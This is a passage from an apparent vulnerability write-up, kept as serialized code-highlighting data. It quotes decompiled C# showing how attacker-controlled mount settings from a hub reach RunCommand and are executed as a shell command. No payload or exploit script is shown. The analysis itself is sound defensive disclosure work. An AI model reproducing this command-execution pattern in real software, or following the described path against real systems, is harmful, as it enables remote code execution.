parameters:",[1373,15490,15491],{"class":2326},"\\r\\n",[1373,15493,183],{"class":1387},[1373,15495,15478],{"class":1397},[1373,15497,15384],{"class":4640},[1373,15499,4680],{"class":1383},[1373,15501,15502,15505,15508,15510,15512,15514,15516,15519,15521,15524,15527,15529,15532,15535,15537,15540,15542,15544,15546,15549,15551,15554,15556,15558,15561,15563],{"class":1375,"line":4915},[1373,15503,15504],{"class":14938}," HttpResponseMessage",[1373,15506,15507],{"class":9372}," httpResponseMessage",[1373,15509,8575],{"class":1397},[1373,15511,15116],{"class":1397},[1373,15513,15278],{"class":4640},[1373,15515,59],{"class":1383},[1373,15517,15518],{"class":7297},"PostAsync",[1373,15520,1384],{"class":1383},[1373,15522,15523],{"class":1397},"new",[1373,15525,15526],{"class":14938}," Uri",[1373,15528,1384],{"class":1383},[1373,15530,15531],{"class":4640},"text3",[1373,15533,15534],{"class":1383},"),",[1373,15536,15283],{"class":1397},[1373,15538,15539],{"class":14938}," StringContent",[1373,15541,1384],{"class":1383},[1373,15543,1359],{"class":4640},[1373,15545,5437],{"class":1383},[1373,15547,15548],{"class":4640}," Encoding",[1373,15550,59],{"class":1383},[1373,15552,15553],{"class":4640},"UTF8",[1373,15555,5437],{"class":1383},[1373,15557,4883],{"class":1387},[1373,15559,15560],{"class":1391},"application\u002Fjson",[1373,15562,183],{"class":1387},[1373,15564,1413],{"class":1383},[1373,15566,15567,15569,15572,15574,15576],{"class":1375,"line":4931},[1373,15568,15504],{"class":14938},[1373,15570,15571],{"class":9372}," httpResponseMessage2",[1373,15573,8575],{"class":1397},[1373,15575,15507],{"class":4640},[1373,15577,4912],{"class":1383},[1373,15579,15580,15582,15585,15587,15589,15591,15593,15596,15598,15601],{"class":1375,"line":4947},[1373,15581,15381],{"class":1397},[1373,15583,15584],{"class":9372}," text4",[1373,15586,8575],{"class":1397},[1373,15588,15116],{"class":1397},[1373,15590,15571],{"class":4640},[1373,15592,59],{"class":1383},[1373,15594,15595],{"class":4640},"Content",[1373,15597,59],{"class":1383},[1373,15599,15600],{"class":7297},"ReadAsStringAsync",[1373,15602,15603],{"class":1383},"();\n",[1373,15605,15606,15608,15610,15612,15614,15616,15619,15621,15623,15625],{"class":1375,"line":4952},[1373,15607,15461],{"class":4640},[1373,15609,59],{"class":1383},[1373,15611,15466],{"class":7297},[1373,15613,1384],{"class":1383},[1373,15615,183],{"class":1387},[1373,15617,15618],{"class":1391},"Connecting to hub results: ",[1373,15620,183],{"class":1387},[1373,15622,15478],{"class":1397},[1373,15624,15584],{"class":4640},[1373,15626,4680],{"class":1383},[1373,15628,15629,15632,15634,15637,15640,15642,15644,15646,15649,15651,15654,15656,15658,15661,15664],{"class":1375,"line":6776},[1373,15630,15631],{"class":14938}," SystemSettingsService",[1373,15633,59],{"class":1383},[1373,15635,15636],{"class":14938},"InitialConnectionResult",[1373,15638,15639],{"class":9372}," decodedObject",[1373,15641,8575],{"class":1397},[1373,15643,15389],{"class":4640},[1373,15645,59],{"class":1383},[1373,15647,15648],{"class":7297},"DeserializeObject",[1373,15650,11852],{"class":1383},[1373,15652,15653],{"class":14938},"SystemSettingsService",[1373,15655,59],{"class":1383},[1373,15657,15636],{"class":14938},[1373,15659,15660],{"class":1383},">(",[1373,15662,15663],{"class":4640},"text4",[1373,15665,4680],{"class":1383},[1373,15667,15668,15670,15672,15675,15678,15681],{"class":1375,"line":6781},[1373,15669,9793],{"class":4636},[1373,15671,4641],{"class":1383},[1373,15673,15674],{"class":4640},"decodedObject ",[1373,15676,15677],{"class":1397},"!=",[1373,15679,15680],{"class":7054}," null",[1373,15682,11875],{"class":1383},[1373,15684,15685],{"class":1375,"line":7524},[1373,15686,9814],{"class":1383},[1373,15688,15689,15692,15695,15697,15699,15701,15703],{"class":1375,"line":7530},[1373,15690,15691],{"class":14938}," NodeHAClusterConfig",[1373,15693,15694],{"class":9372}," haSettings",[1373,15696,8575],{"class":1397},[1373,15698,15362],{"class":4640},[1373,15700,59],{"class":1383},[1373,15702,15164],{"class":4640},[1373,15704,4912],{"class":1383},[1373,15706,15707,15710,15713,15715,15717,15719,15722],{"class":1375,"line":7546},[1373,15708,15709],{"class":1397}," string",[1373,15711,15712],{"class":9372}," sharedSecret",[1373,15714,8575],{"class":1397},[1373,15716,15639],{"class":4640},[1373,15718,59],{"class":1383},[1373,15720,15721],{"class":4640},"SharedSecret",[1373,15723,4912],{"class":1383},[1373,15725,15726,15729,15732,15734,15736,15738,15741],{"class":1375,"line":7571},[1373,15727,15728],{"class":14938}," Guid",[1373,15730,15731],{"class":9372}," clusterId",[1373,15733,8575],{"class":1397},[1373,15735,15639],{"class":4640},[1373,15737,59],{"class":1383},[1373,15739,15740],{"class":4640},"ClusterId",[1373,15742,4912],{"class":1383},[1373,15744,15745,15748,15750,15753,15755,15758,15760,15763,15765,15767,15769,15772],{"class":1375,"line":7598},[1373,15746,15747],{"class":14938}," Dictionary",[1373,15749,11852],{"class":1383},[1373,15751,15752],{"class":1397},"string",[1373,15754,5437],{"class":1383},[1373,15756,15757],{"class":1397}," string",[1373,15759,5384],{"class":1383},[1373,15761,15762],{"class":9372}," targetHubs",[1373,15764,8575],{"class":1397},[1373,15766,15639],{"class":4640},[1373,15768,59],{"class":1383},[1373,15770,15771],{"class":4640},"TargetHubs",[1373,15773,4912],{"class":1383},[1373,15775,15776,15779,15782,15784,15786,15788,15791],{"class":1375,"line":7615},[1373,15777,15778],{"class":1397}," bool",[1373,15780,15781],{"class":9372}," isStandby",[1373,15783,8575],{"class":1397},[1373,15785,15639],{"class":4640},[1373,15787,59],{"class":1383},[1373,15789,15790],{"class":4640},"IsStandby",[1373,15792,4912],{"class":1383},[1373,15794,15795],{"class":1375,"line":7635},[1373,15796,15797],{"class":4636}," try\n",[1373,15799,15800],{"class":1375,"line":7640},[1373,15801,15802],{"class":1383}," {\n",[1373,15804,15805,15808,15811,15813,15815,15818],{"class":1375,"line":7648},[1373,15806,15807],{"class":14938}," JObject",[1373,15809,15810],{"class":9372}," settings",[1373,15812,8575],{"class":1397},[1373,15814,15283],{"class":1397},[1373,15816,15817],{"class":14938}," JObject",[1373,15819,15603],{"class":1383},[1373,15821,15822,15825,15827,15830,15832,15835,15837,15840],{"class":1375,"line":7672},[1373,15823,15824],{"class":4636}," if",[1373,15826,4641],{"class":1383},[1373,15828,15829],{"class":4640},"clusterId ",[1373,15831,15677],{"class":1397},[1373,15833,15834],{"class":4640}," Guid",[1373,15836,59],{"class":1383},[1373,15838,15839],{"class":4640},"Empty",[1373,15841,11875],{"class":1383},[1373,15843,15844],{"class":1375,"line":7688},[1373,15845,15846],{"class":1383}," {\n",[1373,15848,15849,15852,15854,15856,15858,15860,15862,15864,15866,15868,15871],{"class":1375,"line":7709},[1373,15850,15851],{"class":4640}," settings",[1373,15853,7035],{"class":1383},[1373,15855,183],{"class":1387},[1373,15857,15740],{"class":1391},[1373,15859,183],{"class":1387},[1373,15861,15050],{"class":1383},[1373,15863,8575],{"class":1397},[1373,15865,15731],{"class":4640},[1373,15867,59],{"class":1383},[1373,15869,15870],{"class":7297},"ToString",[1373,15872,15603],{"class":1383},[1373,15874,15875],{"class":1375,"line":7714},[1373,15876,15877],{"class":1383}," }\n",[1373,15879,15880,15883,15885,15887,15889,15891,15893,15895,15897],{"class":1375,"line":7722},[1373,15881,15882],{"class":4640}," settings",[1373,15884,7035],{"class":1383},[1373,15886,183],{"class":1387},[1373,15888,15721],{"class":1391},[1373,15890,183],{"class":1387},[1373,15892,15050],{"class":1383},[1373,15894,8575],{"class":1397},[1373,15896,15712],{"class":4640},[1373,15898,4912],{"class":1383},[1373,15900,15901,15904,15907],{"class":1375,"line":9903},[1373,15902,15903],{"class":1397}," object",[1373,15905,15906],{"class":9372}," obj",[1373,15908,4912],{"class":1383},[1373,15910,15911,15913,15915,15918,15921,15923],{"class":1375,"line":9908},[1373,15912,15824],{"class":4636},[1373,15914,4641],{"class":1383},[1373,15916,15917],{"class":4640},"targetHubs ",[1373,15919,15920],{"class":1397},"==",[1373,15922,15680],{"class":7054},[1373,15924,11875],{"class":1383},[1373,15926,15927],{"class":1375,"line":9913},[1373,15928,15846],{"class":1383},[1373,15930,15931,15934,15936,15938],{"class":1375,"line":9932},[1373,15932,15933],{"class":4640}," obj ",[1373,15935,5417],{"class":1397},[1373,15937,15680],{"class":7054},[1373,15939,4912],{"class":1383},[1373,15941,15942],{"class":1375,"line":9937},[1373,15943,15877],{"class":1383},[1373,15945,15946],{"class":1375,"line":9957},[1373,15947,15948],{"class":4636}," else\n",[1373,15950,15951],{"class":1375,"line":9962},[1373,15952,15846],{"class":1383},[1373,15954,15956,15958,15960,15962,15964,15967,15970,15973,15975,15977,15979,15981,15983,15986,15988,15990,15992,15994,15997,15999,16001,16003,16005,16007,16009,16011,16013,16016,16018,16020,16022,16024,16026],{"class":1375,"line":15955},45,[1373,15957,15933],{"class":4640},[1373,15959,5417],{"class":1397},[1373,15961,15762],{"class":4640},[1373,15963,59],{"class":1383},[1373,15965,15966],{"class":7297},"ToDictionary",[1373,15968,15969],{"class":1383},"((",[1373,15971,15972],{"class":14938},"KeyValuePair",[1373,15974,11852],{"class":1383},[1373,15976,15752],{"class":1397},[1373,15978,5437],{"class":1383},[1373,15980,15757],{"class":1397},[1373,15982,5384],{"class":1383},[1373,15984,15985],{"class":9372}," k",[1373,15987,2230],{"class":1383},[1373,15989,4986],{"class":1397},[1373,15991,15985],{"class":4640},[1373,15993,59],{"class":1383},[1373,15995,15996],{"class":4640},"Key",[1373,15998,5437],{"class":1383},[1373,16000,4641],{"class":1383},[1373,16002,15972],{"class":14938},[1373,16004,11852],{"class":1383},[1373,16006,15752],{"class":1397},[1373,16008,5437],{"class":1383},[1373,16010,15757],{"class":1397},[1373,16012,5384],{"class":1383},[1373,16014,16015],{"class":9372}," v",[1373,16017,2230],{"class":1383},[1373,16019,4986],{"class":1397},[1373,16021,16015],{"class":4640},[1373,16023,59],{"class":1383},[1373,16025,2750],{"class":4640},[1373,16027,4680],{"class":1383},[1373,16029,16031],{"class":1375,"line":16030},46,[1373,16032,15877],{"class":1383},[1373,16034,16036,16038,16040,16042,16044,16046,16048,16050,16052,16054,16057,16059,16062,16065,16067,16070,16072,16074,16076,16078],{"class":1375,"line":16035},47,[1373,16037,15882],{"class":4640},[1373,16039,7035],{"class":1383},[1373,16041,183],{"class":1387},[1373,16043,15771],{"class":1391},[1373,16045,183],{"class":1387},[1373,16047,15050],{"class":1383},[1373,16049,8575],{"class":1397},[1373,16051,15817],{"class":4640},[1373,16053,59],{"class":1383},[1373,16055,16056],{"class":7297},"FromObject",[1373,16058,1384],{"class":1383},[1373,16060,16061],{"class":4640},"obj ",[1373,16063,16064],{"class":1397},"??",[1373,16066,15283],{"class":1397},[1373,16068,16069],{"class":14938}," Dictionary",[1373,16071,11852],{"class":1383},[1373,16073,15752],{"class":1397},[1373,16075,5437],{"class":1383},[1373,16077,15757],{"class":1397},[1373,16079,16080],{"class":1383},">());\n",[1373,16082,16084,16086,16088,16091,16094],{"class":1375,"line":16083},48,[1373,16085,15824],{"class":4636},[1373,16087,4641],{"class":1383},[1373,16089,16090],{"class":1397},"!",[1373,16092,16093],{"class":4640},"isStandby",[1373,16095,11875],{"class":1383},[1373,16097,16099],{"class":1375,"line":16098},49,[1373,16100,15846],{"class":1383},[1373,16102,16104,16107,16109,16111,16113,16116,16119,16121,16124,16126,16129,16131,16133,16135,16137,16140,16143],{"class":1375,"line":16103},50,[1373,16105,16106],{"class":4636}," if",[1373,16108,4641],{"class":1383},[1373,16110,16090],{"class":1397},[1373,16112,1384],{"class":1383},[1373,16114,16115],{"class":1397},"await",[1373,16117,16118],{"class":4640}," MountConfiguration",[1373,16120,59],{"class":1383},[1373,16122,16123],{"class":7297},"Mount",[1373,16125,1384],{"class":1383},[1373,16127,16128],{"class":4640},"decodedObject",[1373,16130,59],{"class":1383},[1373,16132,15206],{"class":4640},[1373,16134,5437],{"class":1383},[1373,16136,14986],{"class":14985},[1373,16138,16139],{"class":1383},")).",[1373,16141,16142],{"class":4640},"success",[1373,16144,11875],{"class":1383},[1373,16146,16148],{"class":1375,"line":16147},51,[1373,16149,16150],{"class":1383}," {\n",[1373,16152,16154,16157,16159],{"class":1375,"line":16153},52,[1373,16155,16156],{"class":4636}," return",[1373,16158,15283],{"class":1397},[1373,16160,16161],{"class":14938}," ConnectToHubResult\n",[1373,16163,16165],{"class":1375,"line":16164},53,[1373,16166,16167],{"class":1383}," {\n",[1373,16169,16171,16174,16176,16178,16181,16183],{"class":1375,"line":16170},54,[1373,16172,16173],{"class":4640}," message ",[1373,16175,5417],{"class":1397},[1373,16177,4883],{"class":1387},[1373,16179,16180],{"class":1391},"Failed to mount system mount point",[1373,16182,183],{"class":1387},[1373,16184,9062],{"class":1383},[1373,16186,16188,16191,16193],{"class":1375,"line":16187},55,[1373,16189,16190],{"class":4640}," success ",[1373,16192,5417],{"class":1397},[1373,16194,16195],{"class":14985}," false\n",[1373,16197,16199],{"class":1375,"line":16198},56,[1373,16200,16201],{"class":1383}," };\n",[1373,16203,16205],{"class":1375,"line":16204},57,[1373,16206,16207],{"class":1383}," }\n",[1373,16209,16211,16214,16216,16219,16221,16224,16226,16229,16231,16233,16235,16237,16239,16241,16243,16245,16248,16250],{"class":1375,"line":16210},58,[1373,16212,16213],{"class":4640}," FileManager",[1373,16215,59],{"class":1383},[1373,16217,16218],{"class":7297},"SetNewApplicationDataPath",[1373,16220,1384],{"class":1383},[1373,16222,16223],{"class":4640},"Path",[1373,16225,59],{"class":1383},[1373,16227,16228],{"class":7297},"Combine",[1373,16230,1384],{"class":1383},[1373,16232,16128],{"class":4640},[1373,16234,59],{"class":1383},[1373,16236,15206],{"class":4640},[1373,16238,59],{"class":1383},[1373,16240,15218],{"class":4640},[1373,16242,5437],{"class":1383},[1373,16244,4883],{"class":1387},[1373,16246,16247],{"class":1391},"System",[1373,16249,183],{"class":1387},[1373,16251,1413],{"class":1383},[1373,16253,16255],{"class":1375,"line":16254},59,[1373,16256,15877],{"class":1383},[18,16258,2245,16259,16261,16262,16265],{},[886,16260,16123],{}," task is then run with the attacker controlled parameters and ",[886,16263,16264],{},"MountConfiguration.RunCommand"," is executed:",[1354,16267,16269],{"className":14927,"code":16268,"language":14929,"meta":219,"style":219},"public static async Task\u003CSuccessResult> Mount(MountPointConfig mount, bool isSystemMount = false)\n{\n string testFile = PathX.Combine(mount.MountPath, Guid.NewGuid().ToString());\n SuccessResult successResult;\n try\n {\n if (MountConfiguration.GetMountStatus(mount.MountPath) == MountState.Mounted)\n {\n successResult = SuccessResult.SuccessPacket;\n }\n else\n {\n MountConfiguration.MountInfo[mount.MountPath] = mount;\n if (MountConfiguration.MountInfo[mount.MountPath].ReadOnly && !isSystemMount)\n {\n Exception ex = new Exception(\"Mount failed: \" + mount.MountPath + \" controlled by Hub\");\n MountConfiguration.LogException(ex, \"\");\n throw ex;\n }\n if (!string.IsNullOrWhiteSpace(mount.CommandMount) && mount.CommandMount != \"null\")\n {\n await MountConfiguration.RunCommand(mount.MountPath, mount.CommandMount, mount.UseArgumentsInCommand);\n }\n\n",[886,16270,16271,16314,16318,16361,16371,16376,16380,16417,16421,16438,16442,16446,16450,16476,16512,16516,16560,16582,16591,16595,16640,16644,16683],{"__ignoreMap":219},[1373,16272,16273,16275,16277,16279,16281,16283,16286,16288,16291,16293,16296,16299,16301,16304,16307,16309,16312],{"class":1375,"line":1376},[1373,16274,15019],{"class":4652},[1373,16276,15232],{"class":4652},[1373,16278,15022],{"class":4652},[1373,16280,15025],{"class":14938},[1373,16282,11852],{"class":1383},[1373,16284,16285],{"class":14938},"SuccessResult",[1373,16287,5384],{"class":1383},[1373,16289,16290],{"class":7297}," Mount",[1373,16292,1384],{"class":1383},[1373,16294,16295],{"class":14938},"MountPointConfig",[1373,16297,16298],{"class":9372}," mount",[1373,16300,5437],{"class":1383},[1373,16302,16303],{"class":1397}," bool",[1373,16305,16306],{"class":9372}," isSystemMount",[1373,16308,8575],{"class":1397},[1373,16310,16311],{"class":14985}," false",[1373,16313,11875],{"class":1383},[1373,16315,16316],{"class":1375,"line":220},[1373,16317,8904],{"class":1383},[1373,16319,16320,16323,16326,16328,16331,16333,16335,16337,16340,16342,16344,16346,16348,16350,16353,16356,16358],{"class":1375,"line":1266},[1373,16321,16322],{"class":1397}," string",[1373,16324,16325],{"class":9372}," testFile",[1373,16327,8575],{"class":1397},[1373,16329,16330],{"class":4640}," PathX",[1373,16332,59],{"class":1383},[1373,16334,16228],{"class":7297},[1373,16336,1384],{"class":1383},[1373,16338,16339],{"class":4640},"mount",[1373,16341,59],{"class":1383},[1373,16343,15218],{"class":4640},[1373,16345,5437],{"class":1383},[1373,16347,15834],{"class":4640},[1373,16349,59],{"class":1383},[1373,16351,16352],{"class":7297},"NewGuid",[1373,16354,16355],{"class":1383},"().",[1373,16357,15870],{"class":7297},[1373,16359,16360],{"class":1383},"());\n",[1373,16362,16363,16366,16369],{"class":1375,"line":1852},[1373,16364,16365],{"class":14938}," SuccessResult",[1373,16367,16368],{"class":9372}," successResult",[1373,16370,4912],{"class":1383},[1373,16372,16373],{"class":1375,"line":4692},[1373,16374,16375],{"class":4636}," try\n",[1373,16377,16378],{"class":1375,"line":4724},[1373,16379,9613],{"class":1383},[1373,16381,16382,16384,16386,16389,16391,16394,16396,16398,16400,16402,16404,16407,16410,16412,16415],{"class":1375,"line":4756},[1373,16383,9773],{"class":4636},[1373,16385,4641],{"class":1383},[1373,16387,16388],{"class":4640},"MountConfiguration",[1373,16390,59],{"class":1383},[1373,16392,16393],{"class":7297},"GetMountStatus",[1373,16395,1384],{"class":1383},[1373,16397,16339],{"class":4640},[1373,16399,59],{"class":1383},[1373,16401,15218],{"class":4640},[1373,16403,2230],{"class":1383},[1373,16405,16406],{"class":1397}," ==",[1373,16408,16409],{"class":4640}," MountState",[1373,16411,59],{"class":1383},[1373,16413,16414],{"class":4640},"Mounted",[1373,16416,11875],{"class":1383},[1373,16418,16419],{"class":1375,"line":4768},[1373,16420,9788],{"class":1383},[1373,16422,16423,16426,16428,16431,16433,16436],{"class":1375,"line":4792},[1373,16424,16425],{"class":4640}," successResult ",[1373,16427,5417],{"class":1397},[1373,16429,16430],{"class":4640}," SuccessResult",[1373,16432,59],{"class":1383},[1373,16434,16435],{"class":4640},"SuccessPacket",[1373,16437,4912],{"class":1383},[1373,16439,16440],{"class":1375,"line":4798},[1373,16441,9861],{"class":1383},[1373,16443,16444],{"class":1375,"line":4806},[1373,16445,9866],{"class":4636},[1373,16447,16448],{"class":1375,"line":4817},[1373,16449,9788],{"class":1383},[1373,16451,16452,16455,16457,16460,16462,16464,16466,16468,16470,16472,16474],{"class":1375,"line":4825},[1373,16453,16454],{"class":4640}," MountConfiguration",[1373,16456,59],{"class":1383},[1373,16458,16459],{"class":4640},"MountInfo",[1373,16461,7035],{"class":1383},[1373,16463,16339],{"class":4640},[1373,16465,59],{"class":1383},[1373,16467,15218],{"class":4640},[1373,16469,15050],{"class":1383},[1373,16471,8575],{"class":1397},[1373,16473,16298],{"class":4640},[1373,16475,4912],{"class":1383},[1373,16477,16478,16480,16482,16484,16486,16488,16490,16492,16494,16496,16499,16502,16505,16507,16510],{"class":1375,"line":4835},[1373,16479,9793],{"class":4636},[1373,16481,4641],{"class":1383},[1373,16483,16388],{"class":4640},[1373,16485,59],{"class":1383},[1373,16487,16459],{"class":4640},[1373,16489,7035],{"class":1383},[1373,16491,16339],{"class":4640},[1373,16493,59],{"class":1383},[1373,16495,15218],{"class":4640},[1373,16497,16498],{"class":1383},"].",[1373,16500,16501],{"class":4640},"ReadOnly ",[1373,16503,16504],{"class":1397},"&&",[1373,16506,7370],{"class":1397},[1373,16508,16509],{"class":4640},"isSystemMount",[1373,16511,11875],{"class":1383},[1373,16513,16514],{"class":1375,"line":4843},[1373,16515,9814],{"class":1383},[1373,16517,16518,16521,16524,16526,16528,16531,16533,16535,16538,16540,16542,16544,16546,16549,16551,16553,16556,16558],{"class":1375,"line":4849},[1373,16519,16520],{"class":14938}," Exception",[1373,16522,16523],{"class":9372}," ex",[1373,16525,8575],{"class":1397},[1373,16527,15283],{"class":1397},[1373,16529,16530],{"class":14938}," Exception",[1373,16532,1384],{"class":1383},[1373,16534,183],{"class":1387},[1373,16536,16537],{"class":1391},"Mount failed: ",[1373,16539,183],{"class":1387},[1373,16541,15478],{"class":1397},[1373,16543,16298],{"class":4640},[1373,16545,59],{"class":1383},[1373,16547,16548],{"class":4640},"MountPath ",[1373,16550,15448],{"class":1397},[1373,16552,4883],{"class":1387},[1373,16554,16555],{"class":1391}," controlled by Hub",[1373,16557,183],{"class":1387},[1373,16559,4680],{"class":1383},[1373,16561,16562,16565,16567,16570,16572,16575,16577,16580],{"class":1375,"line":4877},[1373,16563,16564],{"class":4640}," MountConfiguration",[1373,16566,59],{"class":1383},[1373,16568,16569],{"class":7297},"LogException",[1373,16571,1384],{"class":1383},[1373,16573,16574],{"class":4640},"ex",[1373,16576,5437],{"class":1383},[1373,16578,16579],{"class":1387}," \"\"",[1373,16581,4680],{"class":1383},[1373,16583,16584,16587,16589],{"class":1375,"line":4915},[1373,16585,16586],{"class":4636}," throw",[1373,16588,16523],{"class":4640},[1373,16590,4912],{"class":1383},[1373,16592,16593],{"class":1375,"line":4931},[1373,16594,9832],{"class":1383},[1373,16596,16597,16599,16601,16603,16605,16607,16610,16612,16614,16616,16618,16620,16623,16625,16627,16630,16632,16634,16636,16638],{"class":1375,"line":4947},[1373,16598,9793],{"class":4636},[1373,16600,4641],{"class":1383},[1373,16602,16090],{"class":1397},[1373,16604,15752],{"class":1397},[1373,16606,59],{"class":1383},[1373,16608,16609],{"class":7297},"IsNullOrWhiteSpace",[1373,16611,1384],{"class":1383},[1373,16613,16339],{"class":4640},[1373,16615,59],{"class":1383},[1373,16617,14894],{"class":4640},[1373,16619,2230],{"class":1383},[1373,16621,16622],{"class":1397}," &&",[1373,16624,16298],{"class":4640},[1373,16626,59],{"class":1383},[1373,16628,16629],{"class":4640},"CommandMount ",[1373,16631,15677],{"class":1397},[1373,16633,4883],{"class":1387},[1373,16635,7055],{"class":1391},[1373,16637,183],{"class":1387},[1373,16639,11875],{"class":1383},[1373,16641,16642],{"class":1375,"line":4952},[1373,16643,9814],{"class":1383},[1373,16645,16646,16649,16651,16653,16656,16658,16660,16662,16664,16666,16668,16670,16672,16674,16676,16678,16681],{"class":1375,"line":6776},[1373,16647,16648],{"class":1397}," await",[1373,16650,16118],{"class":4640},[1373,16652,59],{"class":1383},[1373,16654,16655],{"class":7297},"RunCommand",[1373,16657,1384],{"class":1383},[1373,16659,16339],{"class":4640},[1373,16661,59],{"class":1383},[1373,16663,15218],{"class":4640},[1373,16665,5437],{"class":1383},[1373,16667,16298],{"class":4640},[1373,16669,59],{"class":1383},[1373,16671,14894],{"class":4640},[1373,16673,5437],{"class":1383},[1373,16675,16298],{"class":4640},[1373,16677,59],{"class":1383},[1373,16679,16680],{"class":4640},"UseArgumentsInCommand",[1373,16682,4680],{"class":1383},[1373,16684,16685],{"class":1375,"line":6781},[1373,16686,9832],{"class":1383},[18,16688,16689,16690,16693],{},"This, in turn, calls ",[886,16691,16692],{},"CommandLine.RunCommand"," with the attacker-controlled mount configuration:",[1354,16695,16697],{"className":14927,"code":16696,"language":14929,"meta":219,"style":219},"private static async Task RunCommand(string path, string command, bool includeArgs)\n{\n if (!string.IsNullOrWhiteSpace(command))\n {\n MountConfiguration.LogDetail(\"Run command path: \" + path);\n if (includeArgs)\n {\n HANodeConfig currentNodeConfig = HAClusterConfig.Instance.CurrentNodeConfig;\n string text = ((currentNodeConfig != null) ? currentNodeConfig.GetUserData\u003CHANodeConfig>().Get\u003Cstring>(HANodeConfig.PreviousRunningNode) : null) ?? \"\";\n if (string.IsNullOrWhiteSpace(text))\n {\n text = ((currentNodeConfig != null) ? currentNodeConfig.PrimaryServer : null);\n }\n string text2 = HAClusterConfig.Instance.LocalName;\n if (string.IsNullOrWhiteSpace(text2))\n {\n text2 = Environment.MachineName;\n }\n string text3 = ((currentNodeConfig != null) ? currentNodeConfig.PrimaryServer : null);\n if (string.IsNullOrWhiteSpace(text3))\n {\n text3 = \"local\";\n }\n if (path.Contains(' '))\n {\n path = \"\\\"\" + path + \"\\\"\";\n }\n DefaultInterpolatedStringHandler defaultInterpolatedStringHandler = new DefaultInterpolatedStringHandler(4, 5);\n defaultInterpolatedStringHandler.AppendFormatted(command);\n defaultInterpolatedStringHandler.AppendLiteral(\" \");\n defaultInterpolatedStringHandler.AppendFormatted(text2);\n defaultInterpolatedStringHandler.AppendLiteral(\" \");\n defaultInterpolatedStringHandler.AppendFormatted(text3);\n defaultInterpolatedStringHandler.AppendLiteral(\" \");\n defaultInterpolatedStringHandler.AppendFormatted(text);\n defaultInterpolatedStringHandler.AppendLiteral(\" \");\n defaultInterpolatedStringHandler.AppendFormatted(path);\n command = defaultInterpolatedStringHandler.ToStringAndClear();\n MountConfiguration.LogDetail(\"Run command (with args): \" + command);\n }\n else\n {\n MountConfiguration.LogDetail(\"Run command: \" + command);\n }\n ValueTuple\u003Cstring, bool, string> valueTuple = await CommandLine.RunCommand(FileManager.ApplicationDataPath, command, false, new Action\u003Cstring>(MountConfiguration.\u003CRunCommand>g__ProcessCommandOutput|23_0));\n ValueTuple\u003Cstring, bool, string> valueTuple2 = valueTuple;\n if (!valueTuple2.Item2)\n {\n throw new Exception(\"Process exited with error Mount: \" + path + \", \\n \" + valueTuple2.Item1);\n }\n }\n}\n",[886,16698,16699,16736,16740,16762,16766,16791,16802,16806,16829,16899,16917,16921,16953,16957,16977,16996,17000,17017,17021,17053,17071,17075,17091,17095,17116,17120,17149,17153,17179,17195,17212,17226,17242,17256,17272,17286,17302,17316,17332,17355,17359,17363,17367,17390,17394,17478,17505,17523,17527,17570,17574,17578],{"__ignoreMap":219},[1373,16700,16701,16704,16706,16708,16710,16713,16715,16717,16720,16722,16724,16727,16729,16731,16734],{"class":1375,"line":1376},[1373,16702,16703],{"class":4652},"private",[1373,16705,15232],{"class":4652},[1373,16707,15022],{"class":4652},[1373,16709,15025],{"class":14938},[1373,16711,16712],{"class":7297}," RunCommand",[1373,16714,1384],{"class":1383},[1373,16716,15752],{"class":1397},[1373,16718,16719],{"class":9372}," path",[1373,16721,5437],{"class":1383},[1373,16723,15757],{"class":1397},[1373,16725,16726],{"class":9372}," command",[1373,16728,5437],{"class":1383},[1373,16730,16303],{"class":1397},[1373,16732,16733],{"class":9372}," includeArgs",[1373,16735,11875],{"class":1383},[1373,16737,16738],{"class":1375,"line":220},[1373,16739,8904],{"class":1383},[1373,16741,16742,16744,16746,16748,16750,16752,16754,16756,16759],{"class":1375,"line":1266},[1373,16743,4695],{"class":4636},[1373,16745,4641],{"class":1383},[1373,16747,16090],{"class":1397},[1373,16749,15752],{"class":1397},[1373,16751,59],{"class":1383},[1373,16753,16609],{"class":7297},[1373,16755,1384],{"class":1383},[1373,16757,16758],{"class":4640},"command",[1373,16760,16761],{"class":1383},"))\n",[1373,16763,16764],{"class":1375,"line":1852},[1373,16765,9613],{"class":1383},[1373,16767,16768,16771,16773,16776,16778,16780,16783,16785,16787,16789],{"class":1375,"line":4692},[1373,16769,16770],{"class":4640}," MountConfiguration",[1373,16772,59],{"class":1383},[1373,16774,16775],{"class":7297},"LogDetail",[1373,16777,1384],{"class":1383},[1373,16779,183],{"class":1387},[1373,16781,16782],{"class":1391},"Run command path: ",[1373,16784,183],{"class":1387},[1373,16786,15478],{"class":1397},[1373,16788,16719],{"class":4640},[1373,16790,4680],{"class":1383},[1373,16792,16793,16795,16797,16800],{"class":1375,"line":4724},[1373,16794,9773],{"class":4636},[1373,16796,4641],{"class":1383},[1373,16798,16799],{"class":4640},"includeArgs",[1373,16801,11875],{"class":1383},[1373,16803,16804],{"class":1375,"line":4756},[1373,16805,9788],{"class":1383},[1373,16807,16808,16811,16814,16816,16818,16820,16822,16824,16827],{"class":1375,"line":4768},[1373,16809,16810],{"class":14938}," HANodeConfig",[1373,16812,16813],{"class":9372}," currentNodeConfig",[1373,16815,8575],{"class":1397},[1373,16817,15159],{"class":4640},[1373,16819,59],{"class":1383},[1373,16821,15164],{"class":4640},[1373,16823,59],{"class":1383},[1373,16825,16826],{"class":4640},"CurrentNodeConfig",[1373,16828,4912],{"class":1383},[1373,16830,16831,16833,16835,16837,16840,16843,16845,16847,16849,16852,16854,16856,16859,16861,16864,16867,16870,16872,16874,16876,16878,16880,16883,16885,16888,16890,16892,16895,16897],{"class":1375,"line":4792},[1373,16832,15381],{"class":1397},[1373,16834,15384],{"class":9372},[1373,16836,8575],{"class":1397},[1373,16838,16839],{"class":1383}," ((",[1373,16841,16842],{"class":4640},"currentNodeConfig ",[1373,16844,15677],{"class":1397},[1373,16846,15680],{"class":7054},[1373,16848,2230],{"class":1383},[1373,16850,16851],{"class":1397}," ?",[1373,16853,16813],{"class":4640},[1373,16855,59],{"class":1383},[1373,16857,16858],{"class":7297},"GetUserData",[1373,16860,11852],{"class":1383},[1373,16862,16863],{"class":14938},"HANodeConfig",[1373,16865,16866],{"class":1383},">().",[1373,16868,16869],{"class":7297},"Get",[1373,16871,11852],{"class":1383},[1373,16873,15752],{"class":1397},[1373,16875,15660],{"class":1383},[1373,16877,16863],{"class":4640},[1373,16879,59],{"class":1383},[1373,16881,16882],{"class":4640},"PreviousRunningNode",[1373,16884,2230],{"class":1383},[1373,16886,16887],{"class":1397}," :",[1373,16889,15680],{"class":7054},[1373,16891,2230],{"class":1383},[1373,16893,16894],{"class":1397}," 